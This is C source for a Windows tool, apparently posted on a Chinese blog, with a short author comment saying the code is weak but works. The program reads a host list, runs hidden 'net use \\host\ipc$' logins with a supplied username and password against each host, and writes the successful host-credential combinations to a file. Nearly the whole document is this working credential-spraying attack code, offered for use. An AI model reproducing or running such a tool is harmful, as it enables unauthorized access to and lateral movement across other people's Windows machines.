#include "stdafx.h" #include <stdio.h> #include <windows.h> #include <stdlib.h> struct ThreadParameter{ char Filename[MAX_PATH]; char szusername[MAX_PATH]; char szpassword[MAX_PATH]; }; bool LoginCompter(LPVOID pParam) { FILE* fp; FILE* ffp; char readbuffer[1024],savebuffer[120]; ThreadParameter *tp = (ThreadParameter *)pParam; char cmd[MAX_PATH]; char delcmd[MAX_PATH]; char Buffer[4096]; STARTUPINFO sInfo,info; PROCESS_INFORMATION pInfo; SECURITY_ATTRIBUTES sa; HANDLE hRead,hWrite; DWORD bytesRead; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; fp = fopen(tp->Filename,"rb"); if (fp == NULL) { printf("Open file in error.\r\n"); fclose(fp); return 0; } ffp = fopen("suscess.txt","a+"); if (ffp == NULL) { printf("save fopen file error.\r\n"); fclose(ffp); return -1; } memset(readbuffer,0,sizeof(readbuffer)); while (fgets(readbuffer,sizeof(readbuffer),fp)) { if (!CreatePipe(&hRead,&hWrite,&sa,0)) //创建匿名管道 { printf("CreatePipe failed (%d)!\n", GetLastError()); return false; } GetStartupInfo(&sInfo); sInfo.cb = sizeof(sInfo); sInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; sInfo.wShowWindow = SW_HIDE; sInfo.hStdError = hWrite; //将管道的写端交给子进程 sInfo.hStdOutput = hWrite; memset(&pInfo, 0, sizeof(pInfo)); int len = strlen(readbuffer); if (readbuffer[len-1] == ‘\n‘) { readbuffer[len -2] = ‘\0‘; } memset(cmd,0,sizeof(cmd)); memset(delcmd,0,sizeof(delcmd)); // memset(savebuffer,0,sizeof(savebuffer)); sprintf(cmd,"cmd.exe /c net use %s\\ipc$ %s /u:%s",readbuffer,tp->szpassword,tp->szusername); if(!CreateProcessA(NULL, cmd , NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA)&sInfo, &pInfo)) //创建子进程 { printf("CreateProcess failed (%d)!\n", GetLastError()); CloseHandle(hWrite); CloseHandle(hRead); return false; } CloseHandle(hWrite); //关闭父进程的写端 while (1) { memset(Buffer,0,sizeof(Buffer)); ReadFile(hRead,Buffer,sizeof(Buffer),&bytesRead,NULL); if (bytesRead <= 2) { break; } if (strstr(Buffer,"successfully")) { memset(savebuffer,0,sizeof(savebuffer)); sprintf(savebuffer,"Host:%s Username:%s Passwords:%s suscess",readbuffer,tp->szusername,tp->szpassword); printf(savebuffer); printf("\r\n"); fwrite(savebuffer,120,1,ffp); fwrite("\r\n",2,1,ffp); sprintf(delcmd,"cmd.exe /c net use %s\\ipc$ /del",readbuffer); system(delcmd); } } } fclose(fp); fclose(ffp); WaitForSingleObject(pInfo.hProcess, INFINITE); //等待线程退出 CloseHandle(hRead); //关闭句柄 return true; } int main(int argc,char* argv[]) { ThreadParameter tp; HANDLE threadhandle; if (argc < 4) { printf("[-]:%s Compute_list Username Password\r\n",argv[0]); return -1; } strcpy(tp.Filename,argv[1]); strcpy(tp.szusername,argv[2]); strcpy(tp.szpassword,argv[3]); threadhandle = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)LoginCompter,&tp,0,0); if (threadhandle == INVALID_HANDLE_VALUE) { printf("Create Thread error :%d \r\n",GetLastError()); return -1; } WaitForSingleObject(threadhandle,INFINITE); CloseHandle(threadhandle); return 0; }
代码 写的很弱,但是能用。如果你对这个代码抱有强烈的批评心或者甚至是恶心的地步。还请指出来,虚心接受批评。
时间: 2024-08-14 00:22:45